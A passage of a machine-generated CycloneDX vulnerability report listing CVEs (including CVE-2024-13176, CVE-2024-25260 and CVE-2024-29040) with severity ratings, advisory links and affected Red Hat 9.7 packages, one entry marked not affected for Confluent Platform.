          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        }
      ]
    },
    {
      "id": "CVE-2024-13176",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        385
      ],
      "description": "Issue summary: A timing side-channel which could potentially allow recovering\nthe private key exists in the ECDSA signature computation.\n\nImpact summary: A timing side-channel in ECDSA signature computations\ncould allow recovering the private key by an attacker. However, measuring\nthe timing would require either local access to the signing application or\na very fast network connection with low latency.\n\nThere is a timing signal of around 300 nanoseconds when the top word of\nthe inverted ECDSA nonce value is zero. This can happen with significant\nprobability only for some of the supported elliptic curves. In particular\nthe NIST P-521 curve is affected. To be able to measure this leak, the attacker\nprocess must either be located in the same physical computer or must\nhave a very fast network connection with low latency. For that reason\nthe severity of this vulnerability is Low.\n\nThe FIPS modules in 3.4, 3.3, 3.2, 3.1 and 3.0 are affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-13176"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/01/20/2"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:16046"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-13176"
        },
        {
          "url": "https://bugzilla.redhat.com/2359885"
        },
        {
          "url": "https://bugzilla.redhat.com/2359888"
        },
        {
          "url": "https://bugzilla.redhat.com/2359892"
        },
        {
          "url": "https://bugzilla.redhat.com/2359894"
        },
        {
          "url": "https://bugzilla.redhat.com/2359895"
        },
        {
          "url": "https://bugzilla.redhat.com/2359899"
        },
        {
          "url": "https://bugzilla.redhat.com/2359900"
        },
        {
          "url": "https://bugzilla.redhat.com/2359902"
        },
        {
          "url": "https://bugzilla.redhat.com/2359903"
        },
        {
          "url": "https://bugzilla.redhat.com/2359911"
        },
        {
          "url": "https://bugzilla.redhat.com/2359918"
        },
        {
          "url": "https://bugzilla.redhat.com/2359920"
        },
        {
          "url": "https://bugzilla.redhat.com/2359924"
        },
        {
          "url": "https://bugzilla.redhat.com/2359928"
        },
        {
          "url": "https://bugzilla.redhat.com/2359930"
        },
        {
          "url": "https://bugzilla.redhat.com/2359932"
        },
        {
          "url": "https://bugzilla.redhat.com/2359934"
        },
        {
          "url": "https://bugzilla.redhat.com/2359938"
        },
        {
          "url": "https://bugzilla.redhat.com/2359940"
        },
        {
          "url": "https://bugzilla.redhat.com/2359943"
        },
        {
          "url": "https://bugzilla.redhat.com/2359944"
        },
        {
          "url": "https://bugzilla.redhat.com/2359945"
        },
        {
          "url": "https://bugzilla.redhat.com/2359947"
        },
        {
          "url": "https://bugzilla.redhat.com/2359950"
        },
        {
          "url": "https://bugzilla.redhat.com/2359963"
        },
        {
          "url": "https://bugzilla.redhat.com/2359964"
        },
        {
          "url": "https://bugzilla.redhat.com/2359972"
        },
        {
          "url": "https://bugzilla.redhat.com/2370920"
        },
        {
          "url": "https://bugzilla.redhat.com/2380264"
        },
        {
          "url": "https://bugzilla.redhat.com/2380273"
        },
        {
          "url": "https://bugzilla.redhat.com/2380274"
        },
        {
          "url": "https://bugzilla.redhat.com/2380278"
        },
        {
          "url": "https://bugzilla.redhat.com/2380280"
        },
        {
          "url": "https://bugzilla.redhat.com/2380283"
        },
        {
          "url": "https://bugzilla.redhat.com/2380284"
        },
        {
          "url": "https://bugzilla.redhat.com/2380290"
        },
        {
          "url": "https://bugzilla.redhat.com/2380291"
        },
        {
          "url": "https://bugzilla.redhat.com/2380295"
        },
        {
          "url": "https://bugzilla.redhat.com/2380298"
        },
        {
          "url": "https://bugzilla.redhat.com/2380306"
        },
        {
          "url": "https://bugzilla.redhat.com/2380308"
        },
        {
          "url": "https://bugzilla.redhat.com/2380309"
        },
        {
          "url": "https://bugzilla.redhat.com/2380310"
        },
        {
          "url": "https://bugzilla.redhat.com/2380312"
        },
        {
          "url": "https://bugzilla.redhat.com/2380313"
        },
        {
          "url": "https://bugzilla.redhat.com/2380320"
        },
        {
          "url": "https://bugzilla.redhat.com/2380321"
        },
        {
          "url": "https://bugzilla.redhat.com/2380322"
        },
        {
          "url": "https://bugzilla.redhat.com/2380326"
        },
        {
          "url": "https://bugzilla.redhat.com/2380327"
        },
        {
          "url": "https://bugzilla.redhat.com/2380334"
        },
        {
          "url": "https://bugzilla.redhat.com/2380335"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2338999"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359892"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359894"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359895"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359899"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359900"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359902"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359903"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359911"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359918"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359920"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359924"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359928"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359930"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359934"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359938"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359940"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359943"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359944"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359945"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359947"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359950"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359963"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359964"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359972"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370920"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380264"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380273"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380274"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380278"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380280"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380283"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380284"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380290"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380291"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380295"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380298"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380306"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380308"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380309"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380310"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380312"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380313"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380320"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380321"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380322"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380326"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380327"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380334"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380335"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-13176"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21574"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21575"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21577"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21579"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21580"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21581"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21584"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21585"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30681"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30682"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30683"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30684"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30685"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30687"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30688"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30689"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30693"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30695"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30696"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30699"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30703"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30704"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30705"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30715"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30721"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30722"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50077"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50078"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50079"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50080"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50081"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50082"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50083"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50084"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50085"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50086"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50087"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50088"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50091"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50092"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50093"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50094"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50096"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50097"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50098"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50099"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50100"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50101"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50102"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50104"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5399"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-16046.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:15699"
        },
        {
          "url": "https://github.com/advisories/GHSA-r9fv-h47r-823f"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/07272b05b04836a762b4baa874958af51d513844"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/2af62e74fb59bc469506bc37eb2990ea408d9467"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/392dcb336405a0c94486aa6655057f59fd3a0902"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/4b1cb94a734a7d4ec363ac0a215a25c181e11f65"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/77c608f4c8857e63e98e66444e2e761c9627916f"
        },
        {
          "url": "https://github.openssl.org/openssl/extended-releases/commit/0d5fd1ab987f7571e2c955d8d8b638fc0fb54ded"
        },
        {
          "url": "https://github.openssl.org/openssl/extended-releases/commit/a2639000db19878d5d89586ae7b725080592ae86"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-13176.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-16046.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00028.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13176"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20250120.txt"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250124-0005"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250124-0005/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250418-0010"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250418-0010/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250502-0006"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250502-0006/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7264-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7278-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7894-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-13176"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpuapr2025.html#AppendixMSQL"
        }
      ],
      "published": "2025-01-20T14:15:26+00:00",
      "updated": "2026-04-15T00:35:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1",
          "versions": [
            {
              "version": "1:3.5.1-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1",
          "versions": [
            {
              "version": "1:3.5.1-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        }
      ]
    },
    {
      "id": "CVE-2024-25260",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "elfutils v0.189 was discovered to contain a NULL pointer dereference via the handle_verdef() function at readelf.c.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-25260"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-25260"
        },
        {
          "url": "https://github.com/schsiung/fuzzer_issues/issues/1"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25260"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=31058"
        },
        {
          "url": "https://sourceware.org/elfutils/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7369-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-25260"
        }
      ],
      "published": "2024-02-20T18:15:52+00:00",
      "updated": "2025-04-25T20:42:23+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "0.193-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "0.193-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "0.193-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "The Java Runtime that executes Confluent Platform is not linked against the vulnerable system library, so the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2024-29040",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        502
      ],
      "description": "This repository hosts source code implementing the Trusted Computing Group's (TCG) TPM2 Software Stack (TSS). The JSON Quote Info returned by Fapi_Quote has to be deserialized by Fapi_VerifyQuote to the TPM Structure `TPMS_ATTEST`. For the field `TPM2_GENERATED magic` of this structure any number can be used in the JSON structure. The verifier can receive a state which does not represent the actual, possibly malicious state of the device under test. The malicious device might get access to data it shouldn't, or can use services it shouldn't be able to. This issue has been patched in version 4.1.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-29040"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-29040"
        },
        {
          "url": "https://github.com/tpm2-software/tpm2-tss/commit/710cd0b6adf3a063f34a8e92da46df7a107d9a99"
        },
        {
          "url": "https://github.com/tpm2-software/tpm2-tss/releases/tag/4.1.0"
        },
        {
          "url": "https://github.com/tpm2-software/tpm2-tss/security/advisories/GHSA-837m-jw3m-h9p6"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EFR7SVEWCOXORHPCLLGXEMHFMIGG2MFE/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GI4JFEZBKQQUPJ4RWK6IHEWXAFCEJDPI/"
        },
        {
